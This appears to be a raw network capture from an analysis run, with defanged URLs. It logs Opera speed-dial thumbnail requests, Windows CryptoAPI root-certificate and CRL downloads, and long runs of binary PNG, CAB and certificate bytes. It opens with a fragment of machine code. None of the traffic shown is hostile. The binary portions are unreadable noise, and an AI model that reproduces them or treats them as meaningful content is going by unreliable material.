....j.h .@.d.....PQV.80A.3.P.D$.d.......j..........D$..D$.......t..t$$
...t$$.t$$.......3..D$.....j.j.j.VP......L$.d......Y^.........j.h .@.d
.....PQV.80A.3.P.D$.d........>.t`j..........D$..D$.......t....q
<<< skipped >>>


GET /speeddials/partner/yahoo?ab_tests=DNA-45706-2-group:DNA-45706-2 HTTP/1.1
Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found
Server: Apache/2.2.16 (Debian)
Location: hXXp://redir.opera.com/previews/images/yahoo_other/sd_264x168.png
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/plain
Content-Length: 26
Date: Sat, 19 Dec 2015 19:25:16 GMT
X-Varnish: 2871789006
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS
..............................


GET /speeddials/partner/nordstrom_com?ab_tests=DNA-45706-2-group:DNA-45706-2 HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found
Server: Apache/2.2.16 (Debian)
Location: hXXp://redir.opera.com/previews/images/nordstrom_com/sd_264x168.png
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/plain
Content-Length: 26
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789057
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS
..............................


GET /speeddials/partner/buzzfeed_com?ab_tests=DNA-45706-2-group:DNA-45706-2 HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found
Server: Apache/2.2.16 (Debian)
Location: hXXp://redir.opera.com/previews/images/buzzfeed_com/sd_264x168.png
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/plain
Content-Length: 26
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789083
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS
..............................


GET /previews/images/booking_com_us/sd_264x168.png HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Last-Modified: Thu, 17 Dec 2015 12:28:02 GMT
ETag: "14961b-18e2-527172761b880"
Content-Type: image/png
Content-Length: 6370
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789107 2871737224
Age: 144
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT
X-Varnish-Cache-Hits: 111
.PNG........IHDR.....................IDATx...A.. ..1....5....I-...X..1
.1@.....1@.....1@.......1@.....1@.....1@.....1.1@.....1@.....1@.....1.
1@.......1@.....1@.....1.1@.....1@.....1@..g.<..:......(*....w7...I
VMh..{.hLt..$. ...iJ....-.R..,..5Fco...{...T0..3sy.{.;..&..q.s..;...^.
|.s...w..w..5$v..9x.8{k.....Kc.Z...{..:....o./....Az..2..'....&1...S..
..#.?.....R.2fJ.....1$..#.....4......6<sd..........j...{X...'~.....
......7..............m.w..<.].Y......h..Wh..C.t.J[X....5{.|0......h
.y.1y..W*.1x.....V/.0..f.m.o...r.._.oVz.0.?['..{w........tG.x..q.....?
...{5..aO50P./w...(G.............?.rp.80...v..]...iE.O;0L...l2....{...
.GQ............m.)...(.x..m.......Mb.FEe.........3....#C..m9,...='\.4.
O80......._........_l..IL.XT... .h.$:."t....X..o..:7......GO$..h..G`.f
.'...?.0.8(...1K..K<G&........".......2GO...HC/......&..[...._...#.
*.5V|........O.0R...j..{5...|y...;^.f8zh....K..6...q....F%..F<.:.,.
.W...F..5......L.....S...........{...B....z.2r.N.......D9..U.Z..._....
............o&...d.6.R8...?....;)......2"....kA..0....).Y..T....W...S.
....Ir....;...y..5A.H.=...8 ..7.n.t..S]|&.:.^ ....|p..{...>.a`...$.
...p..m.K....K......}"...S.........#~......#...N..;k^.W....Qy...N}....
[G....|....... .PJ.")..h...g ..0. ...... E......E.0..G...........v..#.
l.~4,..}.....\G.~u(%...Z...LI]..ud...a).~.=..=.....O]..............}..
...k^....QE2./.....z..V.K$..{.7..|{.f..`.1g.............P.s)..S.H..s[&
n....<.....f.W,r.Y..h.P..?.6....w.:..{.[.n.......X|....Va....p....~
...V..<...2~....v../........5-..0... ../>.~...EZx.."m..$=..^
<<< skipped >>>

GET /previews/images/macys_com/sd_264x168.png HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Last-Modified: Thu, 17 Dec 2015 12:28:02 GMT
ETag: "149bb1-1407-527172761b880"
Content-Type: image/png
Content-Length: 5127
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789130 2871690855
Age: 233
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT
X-Varnish-Cache-Hits: 107
.PNG........IHDR.....................IDATx...A.@0..@!.e.V.$.....?...:\
3..b.. ...b.. ...b.. ...b.... ...b.. ...b.. ...b.. . ...b.. ...b.. ...
b.. . ...b.. ...b.. ...b.. ....UJ.9...).......v]7.c.aa.,..7.?.c*.333C.
.Xf:.....e<fffff.0_...........l...~~.....ZI..G.})V....GO.:......O..
%$$.k...3g.$K..._y..k...|...O...*...QQQ6.......Q.p.*U.T.P.j.......s3..
.s..........o.........._...|.H-..O|..........@G'%%.l*44...M%$$xb..../_
>}...........m.......}...K./^.z.A.M...A.......q.FRR...6uC*((h..-v..
.'NL.0.].v.....3.SO=U.@...kw..e..%.n.W.p....Si.|....... .MU.Z...?.7o..
..m.....3f.....h..g...1.D*s..Q.t..m...7....bc.....C..1z.\..7m...W.&M.p
#..e..,Y.d..7o........k.2.8j...s<s..............K../T......;7/b....
.0..<.,[6..MU.._.....s..w.....W_e....R.J.8J.(...O...E...1._...#..L.
2.Y.....j..1^.y...U}..W.F]..;v... .D4.r..5k..^.:Wy..'./R.^.........g..
0.._...[....Y..<y.....B..`h?......xM..w.}..]:\d."!.W.H....m..<..
$4J.,..S.........G..[o..v}L...dI...=s...7l..3j...f........(.......3(b.
8.4C..........`.td...6.I.........h...Q111..].v}....#.!M.r.J.=.....w..x
.....r....z...(W....q#.c.r..W.>......7n..r.=Q;2...... 35.........S.
L..9..8r..G.H6..3...l*.....Z.j..W..GQ..T.RpCx&...s...M..k..ue>.z`..
...b...A-0d....d....2.5;9.!.....$../.<. ...w..W...i...8..7ov..M..I.
&......Q>..aF2.....a.M1......7x...'...}...d.....X,F:.o..7.|.S.e...E
.$:.KR.gU.~}Z....d.oDpr.......>..#.y....>...I!!....[,~.r%>x..
M.N......./.,OJ....9s&v<..1..O....M1.Q8.18....>}..#Q>\.#?...l
.. ......'.........G.8x.`...E=.9...1.9....M...|...M.3.....u~~~|...
<<< skipped >>>

GET /previews/images/wikipedia_org_us/sd_264x168.png HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Last-Modified: Thu, 17 Dec 2015 12:28:02 GMT
ETag: "14a329-7ac-527172761b880"
Content-Type: image/png
Content-Length: 1964
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789153 2871727582
Age: 163
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT
X-Varnish-Cache-Hits: 70
.PNG........IHDR.............9./y...sIDATx...........y.h..Gxz..!B..."D
..!B..."D..!B..."D..!B..."D..!B..D..!B.....^....8.?'....B....r..-P@..@
iE..R.z)..i....-Z.....Z.(:h.B.H/v..@kG ..R.,.).....P...|..g.Y?.e/.;...
...&.9.{......E..........ee]...WTt........gM.^...R}.K..T.O.^5=....zTv.
.V..KYi....%.]. *..kz....8hp.MC..2rt.......mx-R..P=%)M..v.bx!^e....}.F
~..|.....$..3..\E.3$.u...y...mw!t..7......2W...O..u.2j.0%..8m.U9....e.
.K..b.~.#....)....).......`.)e{=......5..&[...y.3Ay.:...<.#h3.c...j
.,Y....V..(.....(.....=.v.B.. .i...SzA......P. .<.v.B..#C.<F..R.
.E@r...D`~.v..)0k.......-.xD....5G ...cF.....ze.T...R.... .!.......g..
..L..L..M...;0_...r.7.!]..G.N..<...8.....<..LT...I.g.LQ....y....
6..$3.`......SdB.O.t='.o.|Gf..Xyl$.rtB.a./..6N..r&..&./..i.P.=....6.:;
.....{.~....8...o.R.K...'y|. ..../c..GK*wSu.....p...LW.B...I..G..m.w..
.c..w..BK0...\..C..:.5..Qk.....#N.yy."`{.'........Z..............n..1.
........f.|.g...`.<...,R.Bh..Myl.)=}..(i.....!.!^.|M>Cp.,...<
.V.<........Cy...Y....G=..Q.......PA.....p."..d...ey<N..Ay.E.w..
.oc...."........#.b7f.|&c.-..E........C.;1.....@....X..*...g..r..$E6..
...'..*f@Z..........g.H..lT.......8......../*... ..BS1..c=.w..A..3....
s........g5[....c..P....Yy~J`..C....0-..T.....xE<..j....z..Z....F=.
...P..)....C7\}[#....g.........ve.7...|.M.lQ......C.Ney.FC...m.$.Z.0A:
....L.:.LW.Bh4N...L..vI...7........c~.l......0?.Lk?.[...W.p._T..2.(...
T^.......B.1.).c..J.e.z...UWb....gD...2^o...3T.~.O*&!..f.dfg. N......x
lBl.L.9Z.$..........|S....a7..9..hr..W.x F!.`.R...@...E..H.......T
<<< skipped >>>


GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/plain
Last-Modified: Thu, 19 Nov 2015 23:18:43 GMT
Accept-Ranges: bytes
ETag: "808bbea12023d11:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Date: Sat, 19 Dec 2015 19:25:12 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
1401D12320A2285D79HTTP/1.1 200 OK..Cache-Control: max-age=604800..Cont
ent-Type: text/plain..Last-Modified: Thu, 19 Nov 2015 23:18:43 GMT..Ac
cept-Ranges: bytes..ETag: "808bbea12023d11:0"..Server: Microsoft-IIS/7
.5..X-Powered-By: ASP.NET..Content-Length: 18..Date: Sat, 19 Dec 2015 
19:25:12 GMT..Connection: keep-alive..X-CCC: UA..X-CID: 2..1401D12320A
2285D79....


GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1


Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/octet-stream
Last-Modified: Fri, 20 Nov 2015 00:02:21 GMT
Accept-Ranges: bytes
ETag: "80a431ba2623d11:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 49695
Date: Sat, 19 Dec 2015 19:25:12 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
MSCF............,...................I.......l.........sGe. .authroot.s
tl.|.V.C9..CK...<T.......%....^..!OD.....N.l.Gy4*.GI.H%.$.........D
H.$%[.gF.t..{..._....9..;3.....r..n.oy.q*....y`vB.8_E..&.0..r..*...DX!
.y...S..F.8....y4.....`...f.$p.....y.N.a.l..a.U.0Mu..?}.....!.{...t..b
u.7)....M.............?.;.g...P.)..a..._..O....k...-.G.Q.)w.1!..[...k'
..!;kT...&..=.E....I!..N. .yu......4.Z5.$Wx.[.t...i~..Ht..Opc ..3....B
. (..k.0H.... zK......=k..........A....... ..A(u.!...1Z.I`.s,\./..<
..sY....;.w91^d.....zXY.Y8.<,........xU..:/.;..N.....jB..j...i.tE..
...1*k...V.mP..Z......C.....Kc.....j.......-..l.....[mA .n.......AO .J
..7iy.z.`.5...:..S...J....Y..Z..je...5..8.~.2...n.&\...Z>.....WJ...
.....q.[.n...3J...fy.......T...I.olj.A.1....N....<..A....i...?.6s.1
.Q.C....X........n?.e...7>..T......v.;.....<.NKql...].....qhN.~.
i....FS..-4.e.$o))...Z"..z2.n...[~ ..B(...N..!.....5<-WB.L..Q.5.U.0
j?...9.5.b.7_o.|.|...o|S.g.1......cW..../...7>h<..::c&<..!..a
d...v.-.D..E......*.3. R`,.....-.DF./......"[`z8.F.$.@.A...e..&\Ea.."B
D6..e..8X.I.^v6.^].j.b...H!E...8^..SB!......`..|Q.=..N...[3..>,7D..
F:..a6.o..2....d'...............!k...%.y..:.?.4#./..4....*....|...G..2
....z.Y.&..0*...p..f!@..-...5..z...' ..{Of.c.....Q....7f...XI.|.......
xXX9E...M....h.a..b.}j..@.. ....#bYW...sl...;~R1'K..Wr.:}.......P#....
...@h~..<....[......|.~.<=.O.....%.)*t*B.q.Q...^.........Da.^Ie.
.....)..{W.....R._................g.2..B....1..IK..=1sn...n....'..8.8.
L.c..........%..dP....tI3....Pz[..K.#..~..;..n....1L"L/$.yj..k..O.
<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436.crt HTTP/1.1


Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Thu, 23 Jul 2015 23:16:35 GMT
Accept-Ranges: bytes
ETag: "80b4b9e9dc5d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 947
Date: Sat, 19 Dec 2015 19:25:13 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
0...0...........;.V.BF..uj.Y..J0...*.H........0a1.0...U....US1.0...U..
..DigiCert Inc1.0...U....VVV.digicert.com1 0...U....DigiCert Global Ro
ot CA0...061110000000Z..311110000000Z0a1.0...U....US1.0...U....DigiCer
t Inc1.0...U....VVV.digicert.com1 0...U....DigiCert Global Root CA0.."
0...*.H.............0.........;..r.....W.P...w........[.. ....N0.S.C.i
.W..."...@..........;qF..f...v'..{...}..H.....z.9.e.J].......(.t.zx.Y.
hn\#2K.N..Zm.p.w........D.X2.u.....G.'j..3.I.`.._.:....JL}>.O_lv^.K
7...".m....j.....d..[).2......B...A2.........X?...I(.p.1......L.N...J=
^......'......c0a0...U...........0...U.......0....0...U........P5V.L.f
........=.U0...U.#..0.....P5V.L.f........=.U0...*.H...............7.H.
....D.OR......yy..$..K ..-.......X..m.zt..)....p...L.....p........c...
`....[.....S..c.?...f.bf..nA..-..wJ..X. Y.@#.-(.E>yT.&...H.7...y`..
....n.D.8/I..E>*.6S.:P.....WIla!....x<,:.k..........8l..l..d.w%W
0..$.....G|..$..0.-...E.P............4_..<.....m.HTTP/1.1 200 OK..C
ontent-Type: application/x-x509-ca-cert..Last-Modified: Thu, 23 Jul 20
15 23:16:35 GMT..Accept-Ranges: bytes..ETag: "80b4b9e9dc5d01:0"..Serve
r: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Content-Length: 947..Date
: Sat, 19 Dec 2015 19:25:13 GMT..Connection: keep-alive..X-CCC: UA..X-
CID: 2..0...0...........;.V.BF..uj.Y..J0...*.H........0a1.0...U....US1
.0...U....DigiCert Inc1.0...U....VVV.digicert.com1 0...U....DigiCert G
lobal Root CA0...061110000000Z..311110000000Z0a1.0...U....US1.0...U...
.DigiCert Inc1.0...U....VVV.digicert.com1 0...U....DigiCert Global
<<< skipped >>>


GET /speeddials/partner/amazon_us?ab_tests=DNA-45706-2-group:DNA-45706-2 HTTP/1.1
Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found
Server: Apache/2.2.16 (Debian)
Location: hXXp://redir.opera.com/previews/images/amazon_us/sd_264x168.png
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/plain
Content-Length: 26
Date: Sat, 19 Dec 2015 19:25:16 GMT
X-Varnish: 2871789004
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS
..............................


GET /speeddials/partner/wallmart_com_us?ab_tests=DNA-45706-2-group:DNA-45706-2 HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found
Server: Apache/2.2.16 (Debian)
Location: hXXp://redir.opera.com/previews/images/wallmart_com/sd_264x168.png
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/plain
Content-Length: 26
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789055
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS
..............................


GET /speeddials/partner/surfeasy?ab_tests=DNA-45706-2-group:DNA-45706-2 HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found
Server: Apache/2.2.16 (Debian)
Location: hXXp://redir.opera.com/previews/images/surfeasy/sd_264x168.png
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/plain
Content-Length: 26
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789084
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS
..............................


GET /previews/images/amazon_us/sd_264x168.png HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Last-Modified: Thu, 17 Dec 2015 12:28:02 GMT
ETag: "76a038-10fb-527172761b880"
Content-Type: image/png
Content-Length: 4347
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789108 2871664745
Age: 288
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT
X-Varnish-Cache-Hits: 145
.PNG........IHDR.....................IDATx.............`.r(... ...b.. 
...b.. ...b.. . ...b.. ...b.. ...b.. .....b.. ...b.. ...b.. .....b.. .
..b.. ...b.. ...b.b........X....2.E.DEA...G.Q.DE.K.((...y........9...$
............Jq...;.g.w...u....9.3....7I.'Fdd... .....?...k%..x...r.*T.
\..-Z|:f..#G.H.b.........{.......l..........N.2.g......w.^....}.......
[.n..j......|...,.`...)S...?.1b.....3.<x.._.....}.........C..]...&g
t;|..........g.....{..{..a..97o..9b.=z.....O...'.7... ...K\.=zT.l.2dH.
}|......V..X..../............}..s.3...T.._..8}...d..)...-[f.....N.8.#G
v..o.H.|..Ab..k.~....E.jw.Y.=..x.{=K....K.....i.MZ.x..w...6.._~.%...b 
8Q...=e.-Q)./_..o.Q..B6..L.8....4..[.n...o......"......)SX-.]r..9..deZ
 .B...c...h3/..R....'......ya.t...X.ha....?..:u.T...............p..(.8
..1k.,..w..........{#.E...w]u.......b ..n..."..1.l....i.......7...X...
U..s".l.q.........i..f/..x....52...\ .....x...8p`<......%......O|.M
..%F.~.Xa.c..%V..H.~..M...W..|.B.'n.7nl....x........"..?nE.V...8.h. $.
V.:W[6..........=x..............?..e.!... .....c. .$.@l W......]K@`;X.
.N ..l.......7..Z......g...g^.xQ........L...Ht....6..g .....5..&M...'.
}.......=..&...s..8@...V.Nmm.(Cx.`..;....A.^.rED..3g..6s....1.......D]
]W....VQ&..K.l.Q........K..q....N..~].z5i..[6.....f.5l.P.@.J.?....C..D
Nu............%..........S.Ne.L.!1P.....C........ ..V..T.-..D.At.9..'V
.\.M&./.h......n0X..6l.K..3l...{W..0a.6....H.3.=...g.....$.3...c..A..)
R.w.M.6......bE...........x.`....80}.t.-...-._3.W....n..=..v....M..Y]3
$..OF.b....n....3B^.A.....R(......7&..C.H-.q...^.f.wb ...Tdh^&v.8@
<<< skipped >>>

GET /previews/images/nordstrom_com/sd_264x168.png HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Last-Modified: Thu, 17 Dec 2015 12:28:02 GMT
ETag: "149ce9-aad-527172761b880"
Content-Type: image/png
Content-Length: 2733
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789131 2871701798
Age: 211
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT
X-Varnish-Cache-Hits: 96
.PNG........IHDR.............9./y...tIDATx......... .G..,..EqD..!B..."
D..!B..."D..!B..."D..!B..."."D..!B...".!B..."D..!B..."D..!B..."D..!B..
...].G..i.........kA.].......y......hwehw7.K...RUg...K=P..f...........
...:......~I..A...A..h....~.>..Ac.|...Y....m...'...d...Zq.../?M& Q1
.. ...m....o...Uk.N.p..}.(.w..!P.....S..?...#.../G....#. p...o..PD. ..
.#......)._3y9*..."7C<../......w.J....a....r.....R......*..?|.}..._
C..]..LX...^sB.Y.....c.n.....?.-_.{7ZM.......:?:$.O......~C.G7..C.a.K.
........G..Gl..!..*;.[84..R..K.....}y..v...S...g... ......i..p~.yp.^..
....qC.X"" ..%].N.(.......[<.q~qO......U.x(.<N..E.~3..]I2...[bjc
v......<.=....!2.7O..2....ug.a..S..#.%..........E.-.-..........^._.
y......9.g.........{.D{.......eX.#B...<... .\[X...*^.yW1....RT.Cdz.
.PT\..8..FVY"..t......._.....29....4..~.(.re.....0..'!.L.@..|..h.k..F.
....G..,..7En.....WL.'8.#@"./..7T.&........F....Q..yjL.*.'.,. ...rF...
.{[.CE.u<..`>R....1...QD..6,8...... }.k,/b....t.../]..`..<...
...,;Wr.EtR..R........rA...#....{.m..."B....x..\.....;l...{u...{...g..
.vDL^.d~....'[...Da.DL...8..x..D......6.q...du..k.::.QDh.ty.....X....`
......."x.C=.............oH)$V.-......'........OrE.2.;..........".-..A
.!?.........h|..c.`..)....ELdt.zPu.~8..M..A^..f...}w..-.d.....go...p.}
.t..L.....#.x.h......M...............S.o...........".!C.Og.....V.{u.|M
i. ].J7....`....$.l.........V...M$...@c._....zh.io.C..Q...p.]C.v..YD2.
EB...6......zNi>H..X........c....J.I.v...4.r......h...b.@.B..%.u...
.H&P"k...N..././"....zW." ...-"...#.2...*wUI...G#......C:..[..t...
<<< skipped >>>

GET /previews/images/buzzfeed_com/sd_264x168.png HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Last-Modified: Thu, 17 Dec 2015 12:28:02 GMT
ETag: "149648-9bb-527172761b880"
Content-Type: image/png
Content-Length: 2491
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789154 2871715096
Age: 186
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT
X-Varnish-Cache-Hits: 83
.PNG........IHDR............. C......PLTE....5*.......f^.....}.KA....z
s...................YP.bZ.ph.h`.......6 ..........[R.8..}v.ZQ....:/.9/
....e\.7,.D9....]T..........^V....<1....F<....qj....B8....?4....
...ld....@5.LC....VM....yq................;0....XO.......C9.un.J@.8-..
.....me.......{t.............PG....RH.OF.......=3.nf.>4............
.OE.UL.qi.............`W.<2.......@6.rk..........og.A7.E;.vo.......
......kc...................H>.............TK....G=....bY...........
..................x....jb..|.g_..........\S._W.....z.......xq....QH.aX
....d\..{.....~....SI.MC..........ND.............ja.^U....KB.......tl.
............WM.................{.wp....................y.ia..........s
k.|u.c[...............................~w.D:.WN.......f]....um.I?.SJ...
.....IDATx^..... .....Mb...].D.....................c..F....c.Q/;......
..]........Y.,.R.(JQ..B.....Qc.=...[.5........;.11.#..3...s....q.<?
.|...>{.s..T.Z`F..A.........=..Y.{.r..T...I&Y...T.....>'G"..h.b.
`..3.'&.1|%...uE.........M..B.U..~..-..0".....>....Y..[A.....A2C..Q
.1.^C.n9D....do.~7V..?.........`.=..M......=.....A!}(..[R.9...z..../Jv
2b.Pr;..T....La.^.1......rGr$^.(~.w.3..!. .wB0q..q...,.f.m.. #.i....{!
..hy.....E...s....-@....T.....i.Q.....y.C$d....-.....x..>@..2Q.....
%E..cI.'.Q".P...=2.....h.#...'.?$.Z.D.zc.B.......{.X..B.'z.{j..@S8....
. 8.7.d.\..O..PL..@Y..}gc.....9.y. w..P...t...C ...o...d.......?5...e.
?93?..&.s....!H.e.H.......u!.Fs....~.....1..!\...4.q...r..B.f...8M....
/}`iU..ZNgC......U.l,..hQ&.....O.Pp.O.."i..!q.. .}Z.B......;@...U.
<<< skipped >>>


GET /pca3-g5.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: s1.symcb.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "7815f750de32498f5b74e8e2036c6131:1449630201"
Last-Modified: Wed, 09 Dec 2015 02:48:37 GMT
Date: Sat, 19 Dec 2015 19:25:12 GMT
Content-Length: 533
Connection: keep-alive
Content-Type: application/pkix-crl
0...0..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U
....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For aut
horized use only1E0C..U...<VeriSign Class 3 Public Primary Certific
ation Authority - G5..151207000000Z..160331235959Z0...*.H.............
@.{....?..A....R9............j..#b..h.q\.........r...{.............'..
.t7...<..H......'F..Y..e.F..a..3..]..}.}1[...........)U.zDE..J.q[&.
..a..Ci|.^J.fQ.-..3........R...g.......Hh..m.v...K..w....:..8....-!.7.
.....;K.....W..:....W8HR]VgS@...~...N.!.Dc..)..s.HTTP/1.1 200 OK..Serv
er: Apache..ETag: "7815f750de32498f5b74e8e2036c6131:1449630201"..Last-
Modified: Wed, 09 Dec 2015 02:48:37 GMT..Date: Sat, 19 Dec 2015 19:25:
12 GMT..Content-Length: 533..Connection: keep-alive..Content-Type: app
lication/pkix-crl..0...0..0...*.H........0..1.0...U....US1.0...U....Ve
riSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 VeriS
ign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 Publ
ic Primary Certification Authority - G5..151207000000Z..160331235959Z0
...*.H.............@.{....?..A....R9............j..#b..h.q\.........r.
..{.............'...t7...<..H......'F..Y..e.F..a..3..]..}.}1[......
